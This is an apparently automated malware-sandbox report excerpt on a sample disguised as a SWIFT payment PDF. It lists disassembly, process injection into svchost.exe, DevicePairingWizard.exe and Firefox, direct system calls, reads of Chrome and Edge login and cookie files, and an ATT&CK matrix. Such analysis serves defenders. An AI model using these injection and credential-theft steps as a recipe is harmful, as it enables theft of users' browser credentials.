                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326F523 mov eax, dword ptr fs:[00000030h]2_2_0326F523
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324252B mov eax, dword ptr fs:[00000030h]2_2_0324252B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324252B mov eax, dword ptr fs:[00000030h]2_2_0324252B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324252B mov eax, dword ptr fs:[00000030h]2_2_0324252B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324252B mov eax, dword ptr fs:[00000030h]2_2_0324252B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324252B mov eax, dword ptr fs:[00000030h]2_2_0324252B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324252B mov eax, dword ptr fs:[00000030h]2_2_0324252B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324252B mov eax, dword ptr fs:[00000030h]2_2_0324252B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03233536 mov eax, dword ptr fs:[00000030h]2_2_03233536
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03233536 mov eax, dword ptr fs:[00000030h]2_2_03233536
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322753F mov eax, dword ptr fs:[00000030h]2_2_0322753F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322753F mov eax, dword ptr fs:[00000030h]2_2_0322753F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322753F mov eax, dword ptr fs:[00000030h]2_2_0322753F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272539 mov eax, dword ptr fs:[00000030h]2_2_03272539
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322B502 mov eax, dword ptr fs:[00000030h]2_2_0322B502
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E507 mov eax, dword ptr fs:[00000030h]2_2_0325E507
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E507 mov eax, dword ptr fs:[00000030h]2_2_0325E507
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E507 mov eax, dword ptr fs:[00000030h]2_2_0325E507
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E507 mov eax, dword ptr fs:[00000030h]2_2_0325E507
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E507 mov eax, dword ptr fs:[00000030h]2_2_0325E507
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E507 mov eax, dword ptr fs:[00000030h]2_2_0325E507
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E507 mov eax, dword ptr fs:[00000030h]2_2_0325E507
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E507 mov eax, dword ptr fs:[00000030h]2_2_0325E507
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03232500 mov eax, dword ptr fs:[00000030h]2_2_03232500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C50D mov eax, dword ptr fs:[00000030h]2_2_0326C50D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C50D mov eax, dword ptr fs:[00000030h]2_2_0326C50D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03251514 mov eax, dword ptr fs:[00000030h]2_2_03251514
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03251514 mov eax, dword ptr fs:[00000030h]2_2_03251514
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03251514 mov eax, dword ptr fs:[00000030h]2_2_03251514
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03251514 mov eax, dword ptr fs:[00000030h]2_2_03251514
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03251514 mov eax, dword ptr fs:[00000030h]2_2_03251514
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03251514 mov eax, dword ptr fs:[00000030h]2_2_03251514
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BC51D mov eax, dword ptr fs:[00000030h]2_2_032BC51D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DF51B mov eax, dword ptr fs:[00000030h]2_2_032DF51B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DF51B mov eax, dword ptr fs:[00000030h]2_2_032DF51B
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004238DA GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,SetEndOfFile,GetLastError,0_2_004238DA
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeNtCreateFile: Direct from: 0x77792F0CJump to behavior
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeNtSetInformationThread: Direct from: 0x77786319Jump to behavior
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeNtQueryVolumeInformationFile: Direct from: 0x77792E4CJump to behavior
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeNtDeviceIoControlFile: Direct from: 0x77792A0CJump to behavior
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeNtAllocateVirtualMemory: Direct from: 0x77792B0CJump to behavior
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeNtOpenSection: Direct from: 0x77792D2CJump to behavior
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeNtQuerySystemInformation: Direct from: 0x777947ECJump to behavior
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeNtSetInformationProcess: Direct from: 0x77792B7CJump to behavior
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeNtReadVirtualMemory: Direct from: 0x77792DACJump to behavior
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeNtOpenFile: Direct from: 0x77792CECJump to behavior
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeNtProtectVirtualMemory: Direct from: 0x77787A4EJump to behavior
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeNtQueryInformationToken: Direct from: 0x77792BCCJump to behavior
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeNtAllocateVirtualMemory: Direct from: 0x77793BBCJump to behavior
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeNtAllocateVirtualMemory: Direct from: 0x77792B1CJump to behavior
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeNtResumeThread: Direct from: 0x777935CCJump to behavior
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeNtReadFile: Direct from: 0x777929FCJump to behavior
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeNtQuerySystemInformation: Direct from: 0x77792D1CJump to behavior
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeNtNotifyChangeKey: Direct from: 0x77793B4CJump to behavior
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeNtWriteVirtualMemory: Direct from: 0x77792D5CJump to behavior
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeNtMapViewOfSection: Direct from: 0x77792C3CJump to behavior
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeNtClose: Direct from: 0x77792A8C
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeNtCreateKey: Direct from: 0x77792B8CJump to behavior
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeNtSetInformationThread: Direct from: 0x77792A6CJump to behavior
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeNtQueryAttributesFile: Direct from: 0x77792D8CJump to behavior
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeNtAllocateVirtualMemory: Direct from: 0x7779480CJump to behavior
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeNtCreateUserProcess: Direct from: 0x7779363CJump to behavior
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeNtQueryInformationProcess: Direct from: 0x77792B46Jump to behavior
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeNtResumeThread: Direct from: 0x77792EDCJump to behavior
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeNtWriteVirtualMemory: Direct from: 0x7779482CJump to behavior
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeNtProtectVirtualMemory: Direct from: 0x77792EBCJump to behavior
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeNtDelayExecution: Direct from: 0x77792CFCJump to behavior
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeNtOpenKeyEx: Direct from: 0x77792ABCJump to behavior
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\DevicePairingWizard.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeSection loaded: NULL target: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeSection loaded: NULL target: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeThread register set: target process: 1752Jump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeThread APC queued: target process: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeJump to behavior
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 71B008Jump to behavior
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0043333C mouse_event,mouse_event,0_2_0043333C
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe"Jump to behavior
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeProcess created: C:\Windows\SysWOW64\DevicePairingWizard.exe "C:\Windows\SysWOW64\DevicePairingWizard.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
                Source: Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe, nmlZZxePqIALDF.exe, 0000000B.00000002.5958126626.0000000001460000.00000002.00000001.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000B.00000000.1368878303.0000000001460000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: nmlZZxePqIALDF.exe, 0000000B.00000002.5958126626.0000000001460000.00000002.00000001.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000B.00000000.1368878303.0000000001460000.00000002.00000001.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000000.1512536199.0000000001BB1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: nmlZZxePqIALDF.exe, 0000000B.00000002.5958126626.0000000001460000.00000002.00000001.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000B.00000000.1368878303.0000000001460000.00000002.00000001.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000000.1512536199.0000000001BB1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
                Source: nmlZZxePqIALDF.exe, 0000000B.00000002.5958126626.0000000001460000.00000002.00000001.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000B.00000000.1368878303.0000000001460000.00000002.00000001.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000000.1512536199.0000000001BB1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: WProgram Manager(
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004720DB GetLocalTime,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0041E364 GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0041E364
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.520000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.520000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000D.00000002.5958070475.00000000014A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1441626408.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1442932990.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.5054439385.0000000004310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.5054354866.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1443008474.00000000035A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.5958733126.0000000002A80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeBinary or memory string: WIN_XP
                Source: Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
                Source: Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeBinary or memory string: WIN_XPe
                Source: Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeBinary or memory string: WIN_VISTA
                Source: Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeBinary or memory string: WIN_7
                Source: Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeBinary or memory string: WIN_8

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.520000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.520000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000D.00000002.5958070475.00000000014A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1441626408.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1442932990.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.5054439385.0000000004310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.5054354866.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1443008474.00000000035A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.5958733126.0000000002A80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0046CEF3 OleInitialize,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                2
                Native API
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                5
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts
                1
                Abuse Elevation Control Mechanism
                1
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                1
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                1
                Abuse Elevation Control Mechanism
                Security Account Manager2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                5
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts
                3
                Obfuscated Files or Information
                NTDS16
                System Information Discovery
                Distributed Component Object Model21
                Input Capture
                5
                Application Layer Protocol
                Traffic DuplicationData Destruction
